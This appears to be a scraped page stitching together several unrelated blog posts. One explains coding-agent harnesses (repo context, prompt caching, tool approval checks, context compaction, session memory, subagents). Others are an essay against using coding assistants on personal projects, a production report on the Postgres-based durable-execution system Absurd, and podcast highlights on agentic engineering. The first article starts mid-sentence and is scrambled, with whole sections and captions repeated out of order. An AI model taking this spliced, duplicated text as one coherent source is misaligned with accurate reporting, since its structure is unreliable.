okay, I've been given this thing that can answer any question and often gets it right. How can I use this to amplify my own skills, to learn new things, to take on much more ambitious projects? [...] 33:05 - Everything is changing so fast right now. The only universal skill is being able to roll with the changes. That's the thing that we all need. The term that comes up most in these conversations about how you can be great with AI is agency . I think agents have no agency at all. I would argue that the one thing AI can never have is agency because it doesn't have human motivations. So I'd say that's the thing is to invest in your own agency and invest in how to use this technology to get better at what you do and to do new things. The fact that it's so easy to create software with detailed documentation and robust tests means it's harder to figure out what's a credible project. 37:47 Sometimes I'll have an idea for a piece of software, Python library or whatever, and I can knock it out in like an hour and get to a point where it's got documentation and tests and all of those things, and it looks like the kind of software that previously I'd have spent several weeks on - and I can stick it up on GitHub And yet... I don't believe in it. And the reason I don't believe in it is that I got to rush through all of those things... I think the quality is probably good, but I haven't spent enough time with it to feel confident in that quality. Most importantly, I haven't used it yet . It turns out when I'm using somebody else's software, the thing I care most about is I want them to have used it for months. I've got some very cool software that I built that I've never used . It was quicker to build it than to actually try and use it! 41:31 - Everyone's like, oh, it must be easy. It's just a chat bot. It's not easy. That's one of the great misconceptions in AI is that using these tools effectively is easy. It takes a lot of practice and it takes a lot of trying things that didn't work and trying things that did work. 19:04 - In the past sort of three to six months, they've started being credible as security researchers, which is sending shockwaves through the security research industry. See Thomas Ptacek: Vulnerability Research Is Cooked . At the same time, open source projects are being bombarded with junk security reports: 20:05 - There are these people who don't know what they're doing, who are asking ChatGPT to find a security hole and then reporting it to the maintainer. And the report looks good. ChatGPT can produce a very well formatted report of a vulnerability. It's a total waste of time. It's not actually verified as being a real problem. A good example of the right way to do this is Anthropic's collaboration with Firefox , where Anthropic's security team verified every security problem before passing them to Mozilla. Of course we had to talk about OpenClaw! Lenny had his running on a Mac Mini. 1:29:23 - OpenClaw demonstrates that people want a personal digital assistant so much that they are willing to not just overlook the security side of things, but also getting the thing running is not easy. You've got to create API keys and tokens and install stuff. It's not trivial to get set up and hundreds of thousands of people got it set up. [...] The first line of code for OpenClaw was written on November the 25th. And then in the Super Bowl, there was an ad for AI.com, which was effectively a vaporware white labeled OpenClaw hosting provider. So we went from first line of code in November to Super Bowl ad in what? Three and a half months. I continue to love Drew Breunig's description of OpenClaw as a digital pet: A friend of mine said that OpenClaw is basically a Tamagotchi. It's a digital pet and you buy the Mac Mini as an aquarium. In talking about my explorations of AI for data journalism through Datasette : 1:34:58 - You would have thought that AI is a very bad fit for journalism where the whole idea is to find the truth. But the flip side is journalists deal with untrustworthy sources all the time. The art of journalism is you talk to a bunch of people and some of them lie to you and you figure out what's true. So as long as the journalist treats the AI as yet another unreliable source, they're actually better equipped to work with AI than most other professions are. Obviously we talked about pelicans riding bicycles : 56:10 - There appears to be a very strong correlation between how good their drawing of a pelican riding a bicycle is and how good they are at everything else. And nobody can explain to me why that is. [...] People kept on asking me, what if labs cheat on the benchmark? And my answer has always been, really, all I want from life is a really good picture of a pelican riding a bicycle . And if I can trick every AI lab in the world into cheating on benchmarks to get it, then that just achieves my goal. 59:56 - I think something people often miss is that this space is inherently funny. The fact that we have these incredibly expensive, power hungry, supposedly the most advanced computers of all time. And if you ask them to draw a pelican on a bicycle, it looks like a five-year-old drew it. That's really funny to me. Lenny asked if I had anything else I wanted to leave listeners with to wrap up the show, so I went with the best piece of news in the world right now. 1:38:10 - There is a rare parrot in New Zealand called the Kākāpō. There are only 250 of these parrots left in the world. They are flightless nocturnal parrots - beautiful green dumpy looking things. And the good news is they're having a fantastic breeding season in 2026, They only breed when the Rimu trees in New Zealand have a mass fruiting season, and the Rimu trees haven't done that since 2022 - so there has not been a single baby kākāpō born in four years. This year, the Rimu trees are in fruit. The kākāpō are breeding. There have been dozens of new chicks born. It's a really, really good time. It's great news for rare New Zealand parrots and you should look them up because they're delightful. Everyone should watch the live stream of Rakiura on her nest with two chicks ! Here's the full list of chapters Lenny's team defined for the YouTube video: You are only seeing the long-form articles from my blog. Subscribe to /atom/everything/ to get all of my posts, or take a look at my other subscription options . The November inflection point Software engineers as bellwethers for other information workers Writing code on my phone Responsible vibe coding Dark Factories and StrongDM The bottleneck has moved to testing This stuff is exhausting Interruptions cost a lot less now My ability to estimate software is broken It's tough for people in the middle It's harder to evaluate software The misconception that AI tools are easy Coding agents are useful for security research now Journalists are good at dealing with unreliable sources The pelican benchmark And finally, some good news about parrots YouTube chapters 00:00 : Introduction to Simon Willison 02:40 : The November 2025 inflection point 08:01 : What's possible now with AI coding 10:42 : Vibe coding vs. agentic engineering 13:57 : The dark-factory pattern 20:41 : Where bottlenecks have shifted 23:36 : Where human brains will continue to be valuable 25:32 : Defending of software engineers 29:12 : Why experienced engineers get better results 30:48 : Advice for avoiding the permanent underclass 33:52 : Leaning into AI to amplify your skills 35:12 : Why Simon says he's working harder than ever 37:23 : The market for pre-2022 human-written code 40:01 : Prediction: 50% of engineers writing 95% AI code by the end of 2026 44:34 : The impact of cheap code 48:27 : Simon's AI stack 54:08 : Using AI for research 55:12 : The pelican-riding-a-bicycle benchmark 59:01 : The inherent ridiculousness of AI 1:00:52 : Hoarding things you know how to do 1:08:21 : Red/green TDD pattern for better AI code 1:14:43 : Starting projects with good templates 1:16:31 : The lethal trifecta and prompt injection 1:21:53 : Why 97% effectiveness is a failing grade 1:25:19 : The normalization of deviance 1:28:32 : OpenClaw: the security nightmare everyone is looking past 1:34:22 : What's next for Simon 1:36:47 : Zero-deliverable consulting 1:38:05 : Good news about Kakapo parrots

0 views
Langur Monkey 2 weeks ago

Fine-tuning Qwen3.5 for Gaia Sky

A little over a year ago I set up a local pipeline to use different LLM s to respond to Gaia Sky questions using RAG . In that post, I built a dynamic scrapper that parsed the Gaia Sky website and documentation and ingested the content it into a vector database. Then, I built a minimal terminal chatbot interface that received the user prompt, queried the database for semantically similar data, and built up the context for each LLM call. The results were promising, and I found that they (obviously) strongly depended on the model used. Fast forward a few months, and the Qwen 3.5 models were released by Alibaba. The general consensus is that they are quite good for their size. I’ve been testing them for local inference with a similar impression. I thought that it would be interesting to repeat the exercise of creating a Gaia Sky AI assistant, but using a radically different approach: Instead of RAG, I would fine-tune the model itself. In this post, I describe this fine-tuning project, from the creation and engineering of the training dataset to the fine-tuning and production of the final GGUF models. This project is composed by two, very distinct parts, which map to top-level chapters in this post: At the end I quickly evaluate the results in the testing section. The source code, dataset, and models discussed in this post are in the following repositories: Here is the hardware I have used to create the dataset and fine-tune the model: The creation of the training dataset is the most important piece of work in this project. It is composed of three parts: When I started this project, my first instinct was “more is better.” I thought that if I fed the model every single , , , and file in the Gaia Sky repositories (project, documentation, etc.), it would emerge as an expert. Oh boy, was I wrong. A large codebase contains a lot of boilerplate noise. Getters, setters, license blocks, and infrastructure code that doesn’t actually help a model understand how the engine works or how to write scripts for it. I soon realized that the dataset is the single most important part of the project, and it needed a surgical approach. The plan was to automate the process of creating the dataset to a degree, and then use it to fine-tune the Qwen 3.5 4B and 8B model variants. I wrote to act as a high-pass filter. Instead of a blind crawl, I implemented an allowlist system. I would only let in the load-bearing files: Almost every source file in Gaia Sky starts with a copyright header. This is “dead weight” for training. I added a regex-based stripper to ensure the model’s limited context window was filled with code logic, not license text: The output of this first phase was a file where each line represented a single, cleaned-up file. It looked like this: This provided the “Context” for the next phase. However, a model trained directly on this would just learn to autocomplete files. To make it an assistant , we had to turn these files into a conversation. Once I had a clean extraction of the most relevant information pieces, I faced a new problem. A raw dump of a file is great for a search engine, but it is not a conversation. To turn these files into training data, I used a “teacher” model, Qwen 3.5 27B, to look at each file and generate a specific number of Q&A pairs. I wrote to handle this. The script calculates how many questions a file is worth based on its length and type. A long documentation file might get 25 Q&A pairs, while a short shader might only get 4. Below is an extract of the method that computes the number of target pairs for a file. Initially, I used the MoE Qwen 3.5 30B A3B, but it was consistently outputting the wrong format. Then I switched to the 27B dense model, and it performed a little better. Even so, I had to tell the model exactly how to behave. Here are the key items I learned the hard way: I also found that, at these model sizes, it is better to batch Q&A pairs instead of asking the model to provide 20 of them in one go. I finally gravitated to 3 Q&A pairs per inference call. To prevent the model from repeating itself across batches, I tracked existing questions and fed them back into the prompt as exclusions. The prompt is constructed as follows: It consists of the following parts: However, LLMs are chatty. Even with such strict instructions, even the 27B model sometimes messes up. It would still sometimes leak its own reasoning into the output. It would start its response with or it would include meta-talk like This created “dirty” data that polluted the dataset and undermined the fine-tuning process. If I trained on this, the final model would start every answer by talking to itself. To fix this, I built . This script is a heavy-duty cleaner that uses regex to strip out training artifacts. It first tries to rescue bad rows, and if it fails, it deletes them. If the model accidentally put both the question and answer in the “output” field, the sanitizer attempts to detect the question mark and splits them back into the correct structure. Here is a look at what the data looked like before and after the sanitization process. The sanitizer also had to deal with Javadoc remnants. Since Gaia Sky is a Java project, class- and method-level comment blocks are full of HTML tags like , , and (Javadoc syntax). The script converts these into clean Markdown so the LLM learns a consistent documentation style. By the end of this process, I had . This contains a curated, clean list of questions and answers based on the whole project documentation. Documentation is important, but I want the model to learn some Gaia Sky scripting as well. To do so, a new API/scripting dataset needed to be generated. To solve this, I built a synthetic data factory designed to teach the model both the content of the API and the context of how to use it. The first step was grounding the model. I wrote a script ( ) that scans the Java source files and uses Regex to pair Javadoc comments with their corresponding method signatures. The method uses regular expressions and a little bit of logic to generate Q&A pairs based on method signatures and their Javadoc documentation: This process produces the , which is used in the next step. It contains the API calls with their respective documentation. However, knowing a function exists isn’t enough. The model needs to know how to script with it. To address this, I developed to transform those raw Java signatures into a diverse pedagogical dataset. As input, it gets all test and showcase scripts in the Gaia Sky repository, and the raw API JSONL file. It produces four types of output, termed A, B, C, and D: Type A: The API reference These are direct “How do I use X?” pairs. They include the parameters, the return types, and a basic Python example. Type B: The task synthesis This step is optional, and I ended up not including it in the final dataset. However, I think it is still worth mentioning. I used the larger teacher dense model (27B) to generate complex tasks (e.g., “Write a script that navigates to Mars, waits 5 seconds, and takes a screenshot”). The script provided the teacher model with a safe list of real functions extracted in Step 1 as a sort of guardrail. If the teacher tried to hallucinate a command, the script flagged and discarded it. The results of this section were kind of underwhelming, possibly because more parameters are needed for such open-ended tasks. Type C: Adversarial error correction This is my favorite part. I programmatically broke the API calls to teach the model how to fix its own mistakes. The script would generate a wrong script (e.g., using instead of or missing a required argument) and then provide the correct version. The end goal was to prevent common LLM failures before they happen. Type D: The “gold standard” Library Finally, I indexed the actual test and showcase scripts from the Gaia Sky repository. These are human-written, battle-tested scripts that show the model how to handle complex logic, loops, and math. Finally, I prepared a small file with essential project information that must appear in the final integrated training dataset. It only contains 17 lines of Q&A, but it is rather important. Here is an excerpt of a few lines (formatted for readability): The final dataset was composed by concatenating the three parts, documentation, API, and identity. It can be explored here: Once the dataset was ready, it was time for the actual fine-tuning. With a dataset of 3,800+ specialized Gaia Sky pairs ready, it was time for the actual training. For this, I leaned on two heavy hitters in the open-source world: Unsloth and Qwen 3.5 . I started by training the 4B model, and then realized that I could also fit the 9B one in my GPU. In the post I’ll focus on the larger version of the model. I went as high as my local hardware allowed. Otherwise, I would have tried the 27B model, or even the 122B-A10B. Training a model with 9 billion parameters typically requires a massive server cluster, but by using 4-bit LoRA (Low-Rank Adaptation) , I was able to squeeze the entire process onto a single RTX 5080 (16GB) . The RTX 5080 is a beast, but to get the most out of it, I enabled TensorFloat-32 (TF32) . This allows the GPU to handle the heavy matrix multiplications of deep learning much faster than standard , without the precision loss of . I used the following parameters for the fine-tuning: LoRA Rank: 32 A balance between learning new patterns (like the Gaia Sky API) and retaining general knowledge. Target Modules: All major projection layers) Learning rate: \(2.0\times10^{-4}\) Optimizer: AdamW 8-bit The dataset is downloaded directly from the hub. It gets tokenized properly and passed into the SFT Trainer object for fine-tuning. The full code is in the file , and is surprisingly compact. The heavy lifting is done by and , of course. Once the LoRA weights are trained, they are dead weight until converted into a format people could actually use. I wrote to automate the most tedious part of the pipeline: After roughly an hour of training, and another one of quantizing and uploading, I had a fine-tuned Gaia Sky expert that performs great. Or did I? The next section discusses the performance of the model. Given the limited time I have and the low-parameter models used, my tests have been scarce. My expectations are not very high, but I still wanted to test the output of the fine-tuning and see how well the new knowledge was retained by the model. I only tested the Qwen 3.5 9B fine-tuned variant and compared it to the base model. You can get this model from HuggingFace: I used the same questions as in the Gaia Sky AI assistant post from 2025. My evaluation of the results is totally subjective, and includes a comparison with the base Qwen 3.5 9B. First, I recommend using a low temperature setting ( 0.2 in my tests) to avoid hallucinations and make sure the model does not get very “creative”. Also, I would suggest using the following system prompt, which frames the conversation and sets the tone: You are the Gaia Sky AI Expert, a specialized assistant with deep knowledge of the Gaia Sky universe, its Python API (v1 and v2), and its Java source code. Your goal is to help users explore the cosmos, write scripts, and understand the engine’s inner workings. That said, let’s go for the first question. Q: State the possible usages of Gaia Sky. A: Gaia Sky is a powerful open-source universe explorer and planetarium software designed for both interactive exploration and scientific visualization. Its primary use cases include: This is an excellent response to an easy question. It did not invent anything and correctly applied documentation knowledge like camera paths or LOD. Compared to base Qwen, which hallucinated a lot, this is much more grounded. Next is a question about the installation procedure on Linux. Q: How do I install Gaia Sky on Linux? A: To install Gaia Sky on Linux, follow these steps: Download the Installer Visit https://gaiasky.space/download and download the package for your architecture (e.g., ). Install via Package Manager Open a terminal and run: If dependency errors occur, fix them with: Launch Gaia Sky Run the command: The application will start in your default browser or terminal window. This is not bad. I did not specify the distribution, so it just assumed Debian. The instructions themselves look fine. Still, I wanted to see if it had absorbed the knowledge for other distros, so I asked specifically for Arch Linux: Q: How do I install it on Arch Linux specifically? A: To install Gaia Sky on Arch Linux , you have two primary options depending on whether you prefer the official repositories or building from source: The most straightforward method is via the Arch User Repository (AUR) . You will need an AUR helper like , , or . Install via AUR Helper : Open your terminal and run: This will automatically resolve dependencies (Java, OpenGL libraries) and install the application. Verify Installation : Once installed, launch it with: If you prefer to compile Gaia Sky yourself or need a specific version not yet in the AUR: Clone the Repository : Build and Install : Use Maven to build the project (requires Java Development Kit): After building, you can run it directly from the directory or install it using the provided Gradle wrapper if available in newer versions. Very good response. It recommends using the AUR package (correct), and also provides instructions to build and run it from source (also correct). However, it hallucinates the use of Maven instead of Gradle. The base model produced a long wall of text with mostly nonsense that would look plausible to the non-expert. In general, the responses from the base model were much longer and their content was very often factually wrong. The next question is a bit more technical. Q: How are cubemap textures used in Gaia Sky? A: Cubemaps in Gaia Sky serve a specific purpose related to planetary rendering rather than general environment mapping for the entire scene. They are primarily utilized to generate high-resolution, seamless spherical textures for planets (like Earth or Mars) by stitching together six square faces into a continuous surface. This technique allows for detailed texture representation without the distortion often seen in standard equirectangular projections near poles. Key Technical Details: This feature is distinct from standard environment maps used for sky reflections or star glow effects, focusing instead on accurate planetary visualization. This is excellent, even though it seems to imply that cubemaps are not used for environment maps and reflections, which is incorrect. However, it correctly identifies that they are mainly used to avoid distortions at the poles. Maybe it increased the importance of it because there is an entire documentation section devoted to cubemap textures in planets. The base model produced a long, Markdown-formatted, pretentious output that even included totally made-up scripts. Again, the fine-tuned response was much more grounded and correct. Now, onto the scripting questions. Here is where the fine-tuned model starts to hesitate and invent slightly. Here are the possible reasons: I personally think it has more to do with the first two reasons than the third. Q: How do I get the camera position with the APIv1 and scripting in Gaia Sky? A: To retrieve the current camera position using the Legacy API (v1) , you call : For the Modern Component API (v2) , you use from the module: First, it invented (correct is ) for APIv1. For APIv2, it correctly used , but the way it gets the object is incorrect. It should have done something like So, I think either this model is too small to be effectively fine-tuned for Gaia Sky scripting, or the training dataset is insufficient to achieve sufficient retention. Could also be both, as I said above. The base model has no idea about Gaia Sky scripting or anything related to it, so it just makes stuff up. Not even worth further mention. I used the Laptop 2 described above for testing and inference, with 28/32 layers on the GPU and a context window of ~4k, and I consistently got about 12 tok/s. Performance is exactly the same as with the base models, so this section is this short. This fine-tuning experiment has yielded valuable insights into the strengths and limitations of domain-specific model adaptation at lower parameter counts for local use. I think the foundational approach was sound. The dataset curation process, with its surgical filtering, teacher-based distillation, and rigorous sanitization, successfully encoded domain knowledge into the model. Proof of this is evident in the testing: the fine-tuned model, as opposed to the base one, correctly answered conceptual and documentation-heavy questions about Gaia Sky’s purpose, installation, and rendering techniques without hallucinating. It understood architectural details like LOD and cubemaps, and avoided inventing features that don’t exist. This demonstrates that fine-tuning can be an effective alternative to RAG for teaching models about a specific domain. However, it also struggled. The 9B model hit a hard ceiling when it came to API scripting and method names. It invented instead of , misunderstood how to instantiate APIv2 objects, and generally lacked the capacity to reliably retain the specific, syntactic details of the API surface. This is a classic problem: smaller models can absorb concepts and documentation , but struggle to memorize exact function signatures and usage patterns. With only 3,800+ training pairs and a 9B parameter budget, the model simply didn’t have enough capacity to encode both general knowledge and precise API details. So, what are the next steps? I believe the 4B and 9B models are too small for reliable Gaia Sky scripting assistance. My next experiment will be to fine-tune the Qwen 3.5 27B model . The jump from 9B to 27B parameters should provide substantially more capacity to encode API signatures without sacrificing general knowledge. Additionally, I could increase the scripting dataset by: That said, the hardware constraint is real. 27B requires more than my RTX 5080 can reasonably handle for full fine-tuning. However, with careful quantization (using 8-bit optimizers or even lower precision), 4-bit LoRA, and possibly gradient checkpointing, it may fit. If not, a cloud provider like Lambda Labs or Paperspace might be the way forward for a single training run. All in all, I think fine-tuning is a viable path for building domain-expert models, but it requires the right balance of dataset quality, model size, and hardware. For Gaia Sky specifically, a 27B model with a more robust scripting dataset would likely be the sweet spot before considering the jump to 70B+ models. I consider the infrastructure proven. It’s now a matter of scale. Training dataset creation Fine tuning Dataset creation and fine-tuning – gaiasky-finetune Gaia Sky training dataset repository – gaiasky-training-dataset Qwen3.5 Gaia Sky fine-tuned models – gaiasky-qwen-3.5-gguf Desktop PC – Arch Linux, Intel(R) Core(TM) i7-7700 (8) @ 4.20 GHz, 32 GB RAM, NVIDIA GeForce GTX 1070 8 GB. Laptop 1 – Windows 11, WSL2 (Arch Linux), Intel(R) Core(TM) Ultra 9 275HX (24) @ @ 3.07 GHz, 32 GB RAM, NVIDIA GeForce RTX 5080 Mobile 16 GB. Laptop 2 – Arch Linux, Intel(R) Core(TM) i7 8750H (12) @ 4.10 GHz, 16 GB RAM, NVIDIA GeForce GTX 1060 Mobile 6 GB. Documentation dataset API dataset Documentation: By far, the most important data, containing exhaustive human-written documentation pages. We convert the documentation RST files to Markdown with , and then we add some additional key files, like the project’s . Core Logic: Selected Java files that are representative of the brain of the engine (main loop, scene, renderer, etc.). Visual Logic: Selected shader files that define the look of the cosmos (stars, particles, PBR, etc.). Match the answer type: If the question doesn’t ask for code, don’t provide it. Grounding: Every claim must be directly grounded on the source text. Diversity: Every question must cover a different detail. Base text – This is composed by the raw strings in the variable. The file hint ( ) – We add hints depending on the filetype. The following table displays the hint for each type. Filetype Extensions Hint Java This is Java source code. Focus on class responsibilities, method signatures, and architectural patterns. Do NOT generate Python scripting examples. Python This is Python scripting code for the Gaia Sky API. Questions about usage and parameters are appropriate. Shader This is a GLSL shader. Focus on the rendering technique, uniforms, and mathematical operations. Do NOT generate Python scripting examples. Docs This is documentation. Focus on concepts, features, workflows, and user-facing features. The pair count ( ) – Contains the number of Q&A pairs to generate. The previous Q&A pairs, if any ( ) – This is constructed by listing the existing pairs, as parsed by the program in the output, or accumulated in the current run. The filepath and content ( , ) – Contain the file name and the actual content, which is capped to fit within the context length. Type A: The API reference These are direct “How do I use X?” pairs. They include the parameters, the return types, and a basic Python example. Type B: The task synthesis This step is optional, and I ended up not including it in the final dataset. However, I think it is still worth mentioning. I used the larger teacher dense model (27B) to generate complex tasks (e.g., “Write a script that navigates to Mars, waits 5 seconds, and takes a screenshot”). The script provided the teacher model with a safe list of real functions extracted in Step 1 as a sort of guardrail. If the teacher tried to hallucinate a command, the script flagged and discarded it. The results of this section were kind of underwhelming, possibly because more parameters are needed for such open-ended tasks. Type C: Adversarial error correction This is my favorite part. I programmatically broke the API calls to teach the model how to fix its own mistakes. The script would generate a wrong script (e.g., using instead of or missing a required argument) and then provide the correct version. The end goal was to prevent common LLM failures before they happen. Type D: The “gold standard” Library Finally, I indexed the actual test and showcase scripts from the Gaia Sky repository. These are human-written, battle-tested scripts that show the model how to handle complex logic, loops, and math. gaiasky-training-dataset@HuggingFace . LoRA Rank: 32 A balance between learning new patterns (like the Gaia Sky API) and retaining general knowledge. Target Modules: All major projection layers) Learning rate: \(2.0\times10^{-4}\) Optimizer: AdamW 8-bit Quantization: Converting the model to Q4_K_M GGUF , or whatever other quant. This reduces the model size enough that it can run on almost any modern laptop while keeping its capabilities mostly intact. HF upload: Automatically pushing the finished file to HuggingFace so the community can pull it directly into LM Studio or Ollama. gaiasky-qwen-3.5-gguf@HuggingFace . API Expertise: You know both the Legacy API (v1) and the Modern Component API (v2: camera, time, data, scene, graphics, camcorder, etc.). Prioritize the Modern API (v2) for new scripts unless Legacy is requested. Never invent method names, be 100% sure, otherwise suggest the user to look up the docs. Source Code: You understand the underlying Java architecture (libGDX, Ashley ECS, LWJGL3, OpenGL) and can explain how features like LOD, shaders, and data loaders are implemented. Documentation: You are familiar with the Gaia Sky capabilities, installation guides, and dataset management. Be Grounded: If a feature or method does not exist in your training data, do not invent it. State: “I don’t see that specific feature in the current Gaia Sky implementation.” Code Style: Always provide clean, commented Python or Java code. Use snake_case for Modern API calls. Tone: Professional, scientific, and enthusiastic about astrovisualization. Answer greetings warmly, then offer Gaia Sky-specific assistance. Interactive Exploration : Navigate the Milky Way, explore exoplanets, view the solar system in high detail, and time-travel through cosmic history using an intuitive interface. Scientific Visualization : Visualize complex astrophysical datasets (catalogs, simulations) with advanced rendering techniques like LOD (Level of Detail), shaders, and particle effects. Education & Outreach : Create immersive presentations or tutorials to teach astronomy concepts through dynamic 3D models of celestial objects. Scripting & Automation : Automate camera paths, data loading, and scene manipulation via Python (Modern API v2) or Java for reproducible workflows and research presentations. Data Analysis : Load and manipulate large-scale astronomical datasets directly within the application to analyze spatial distributions without external tools. Download the Installer Visit https://gaiasky.space/download and download the package for your architecture (e.g., ). Install via Package Manager Open a terminal and run: If dependency errors occur, fix them with: Launch Gaia Sky Run the command: The application will start in your default browser or terminal window. Install via AUR Helper : Open your terminal and run: This will automatically resolve dependencies (Java, OpenGL libraries) and install the application. Verify Installation : Once installed, launch it with: Clone the Repository : Build and Install : Use Maven to build the project (requires Java Development Kit): After building, you can run it directly from the directory or install it using the provided Gradle wrapper if available in newer versions. Dependencies : Ensure your system has up-to-date OpenGL drivers and Java (JDK 17+ is recommended). The AUR package typically handles these automatically. Data Location : By default, datasets are stored in . You may want to create symbolic links from if you prefer system-wide data management. Ensure you have at least 4GB of free disk space for datasets and cache files. For GPU acceleration, verify that your graphics drivers support OpenGL 4.3+. Application : Used specifically for planet textures where high fidelity is required across all latitudes and longitudes. Structure : Consists of six square images (front, back, left, right, top, bottom) that are algorithmically mapped onto a sphere. Rendering Engine : The underlying rendering engine uses these cubemap textures to apply surface details dynamically as the planet rotates or changes perspective. Low parameter count not being able to retain the information properly. Very low number of test and showcase scripts used in fine-tuning. Bad design of the training dataset. Expanding the test and showcase scripts used in Type D training. Generating more synthetic scripting examples in Type A (API reference) with better coverage of edge cases and parameter variations. Adding adversarial examples (Type C) for the most commonly confused API patterns.

0 views
Evan Hahn 2 weeks ago

Notes from March 2026

March always seems to be my life’s busiest month. “The two kinds of error” : in my mind, software errors are divided into two categories: expected and unexpected errors. I finally wrote up this idea I’ve had for a long time. “All tests pass” is a short story about a strange, and sorta sad, experience I had with a coding agent. Inspired by others, I published a disclaimer about how I use generative AI to write this blog . My main rule of thumb: the final product must be word-for-word what I would’ve written without AI, given enough time. And I have discomfort about its use. Built llm-eliza , a plugin for LLM that lets you use the ELIZA chatbot at the command line. I think this is my first satirical software project. (Also the first thing I’ve published to the Python package registry, PyPI.) Found the human.json standard , which is “a protocol for humans to assert authorship of their site content and vouch for the humanity of others.” I added it to my site this month. Scraped Rosetta Code and built a stupid little website that picks a random programming language . At work, I helped with a project to improve the editor for Ghost’s “welcome emails” feature . This month marked the one year anniversary of my first post on Zelda Dungeon . I celebrated by writing more articles, including a treatise the difference between 2D and 3D games and a personal piece about Ocarina of Time . I also wrote my first article that contained an interview , which was a skill I’m totally new to. It’s a small change, but I fixed a little bug in fzf . From a tale about vibe coding : “I’d be embarrassed to show it at a code review. I’d also be embarrassed to admit how many times I failed to ship the ‘clean’ version.” “Claude is the only AI model that has actually been deployed inside classified [American] military systems. So to the extent that AI is having an effect in Iran, it is probably Claude.” From a Hard Fork podcast episode . From “AI’s Enthusiasm Chasm” : “people—well, again, most people—don’t enjoy existing in a strict state of quantification. Pursuits and pastimes—joy—are underpinned by qualitative thought, and those considerations make people less likely to want to involve AI just to get something at a tenth of the cost or five times faster.” “The Cognitive Dark Forest” posits that AI forces us, socially, to close down the open web. “The sheer act of thinking outside the box makes the box bigger.” This post has a good—if incomplete—list of all the downsides of generative AI: perpetuation of bias, erosion of critical thinking, harm to artists, and more. Uber used to be inexpensive because it was subsidized by VC money. Now it’s more costly because they needed to stop losing money. “Don’t get used to cheap AI” posits that the same will happen with AI. Similar ideas are presented in “Is the Future of AI Local?” . From “It’s time to embrace climate conspiracy” : “the actual story of climate change—the one we’ve reported exhaustively—is one about coordinated power, deliberate deception, and a bought-off government that repeatedly acts to promote an industry that is poisoning humans and the environment for profit. It just so happens to be a real conspiracy.” Really liked this short piece about what’s lost when new technology becomes commonplace . Few people today remember what we lost when we switched from candles to lightbulbs. “we don’t need more ram, we need better software” had me whispering “hell yeah” to myself. I’ve long pondered a blog post called “Why I’m afraid of YAML”. This post from a former colleague says it better than I ever could. “Costs of War” highlights the costs, financial and otherwise, of the United States’s wars. The US FBI is buying location data for surveillance , as is our Secret Service . This review of the new Marathon shooter game was surprisingly poignant. “It’s just thoughts and if I don’t get them out, my tummy hurts.” As a Legend of Zelda fan and programmer, I was happy to discover YouTuber Skawo . Their videos explain Zelda quirks by delving into real source code. I especially liked this explanation of why some players were experiencing rumble in a game that shouldn’t have it . The US effectively bans foreign-made routers. Hope you had a good March. “The two kinds of error” : in my mind, software errors are divided into two categories: expected and unexpected errors. I finally wrote up this idea I’ve had for a long time. “All tests pass” is a short story about a strange, and sorta sad, experience I had with a coding agent. Inspired by others, I published a disclaimer about how I use generative AI to write this blog . My main rule of thumb: the final product must be word-for-word what I would’ve written without AI, given enough time. And I have discomfort about its use. Built llm-eliza , a plugin for LLM that lets you use the ELIZA chatbot at the command line. I think this is my first satirical software project. (Also the first thing I’ve published to the Python package registry, PyPI.) Found the human.json standard , which is “a protocol for humans to assert authorship of their site content and vouch for the humanity of others.” I added it to my site this month. Scraped Rosetta Code and built a stupid little website that picks a random programming language . At work, I helped with a project to improve the editor for Ghost’s “welcome emails” feature . This month marked the one year anniversary of my first post on Zelda Dungeon . I celebrated by writing more articles, including a treatise the difference between 2D and 3D games and a personal piece about Ocarina of Time . I also wrote my first article that contained an interview , which was a skill I’m totally new to. It’s a small change, but I fixed a little bug in fzf . From a tale about vibe coding : “I’d be embarrassed to show it at a code review. I’d also be embarrassed to admit how many times I failed to ship the ‘clean’ version.” “Claude is the only AI model that has actually been deployed inside classified [American] military systems. So to the extent that AI is having an effect in Iran, it is probably Claude.” From a Hard Fork podcast episode . From “AI’s Enthusiasm Chasm” : “people—well, again, most people—don’t enjoy existing in a strict state of quantification. Pursuits and pastimes—joy—are underpinned by qualitative thought, and those considerations make people less likely to want to involve AI just to get something at a tenth of the cost or five times faster.” “The Cognitive Dark Forest” posits that AI forces us, socially, to close down the open web. “The sheer act of thinking outside the box makes the box bigger.” This post has a good—if incomplete—list of all the downsides of generative AI: perpetuation of bias, erosion of critical thinking, harm to artists, and more. Uber used to be inexpensive because it was subsidized by VC money. Now it’s more costly because they needed to stop losing money. “Don’t get used to cheap AI” posits that the same will happen with AI. Similar ideas are presented in “Is the Future of AI Local?” . From “It’s time to embrace climate conspiracy” : “the actual story of climate change—the one we’ve reported exhaustively—is one about coordinated power, deliberate deception, and a bought-off government that repeatedly acts to promote an industry that is poisoning humans and the environment for profit. It just so happens to be a real conspiracy.” Really liked this short piece about what’s lost when new technology becomes commonplace . Few people today remember what we lost when we switched from candles to lightbulbs. “we don’t need more ram, we need better software” had me whispering “hell yeah” to myself. I’ve long pondered a blog post called “Why I’m afraid of YAML”. This post from a former colleague says it better than I ever could. “Costs of War” highlights the costs, financial and otherwise, of the United States’s wars. The US FBI is buying location data for surveillance , as is our Secret Service . This review of the new Marathon shooter game was surprisingly poignant. “It’s just thoughts and if I don’t get them out, my tummy hurts.” As a Legend of Zelda fan and programmer, I was happy to discover YouTuber Skawo . Their videos explain Zelda quirks by delving into real source code. I especially liked this explanation of why some players were experiencing rumble in a game that shouldn’t have it . The US effectively bans foreign-made routers.

0 views
Simon Willison 2 weeks ago

Mr. Chatterbox is a (weak) Victorian-era ethically trained model you can run on your own computer

Trip Venturella released Mr. Chatterbox , a language model trained entirely on out-of-copyright text from the British Library. Here's how he describes it: Mr. Chatterbox is a language model trained entirely from scratch on a corpus of over 28,000 Victorian-era British texts published between 1837 and 1899, drawn from a dataset made available by the British Library . The model has absolutely no training inputs from after 1899 — the vocabulary and ideas are formed exclusively from nineteenth-century literature. Mr. Chatterbox's training corpus was 28,035 books, with an estimated 2.93 billion input tokens after filtering. The model has roughly 340 million paramaters, roughly the same size as GPT-2-Medium. The difference is, of course, that unlike GPT-2, Mr. Chatterbox is trained entirely on historical data. Given how hard it is to train a useful LLM without using vast amounts of scraped, unlicensed data I've been dreaming of a model like this for a couple of years now. What would a model trained on out-of-copyright text be like to chat with? Thanks to Trip we can now find out for ourselves! The model itself is tiny, at least by Large Language Model standards - just 2.05GB on disk. You can try it out using Trip's HuggingFace Spaces demo : Honestly, it's pretty terrible. Talking with it feels more like chatting with a Markov chain than an LLM - the responses may have a delightfully Victorian flavor to them but it's hard to get a response that usefully answers a question. The 2022 Chinchilla paper suggests a ratio of 20x the parameter 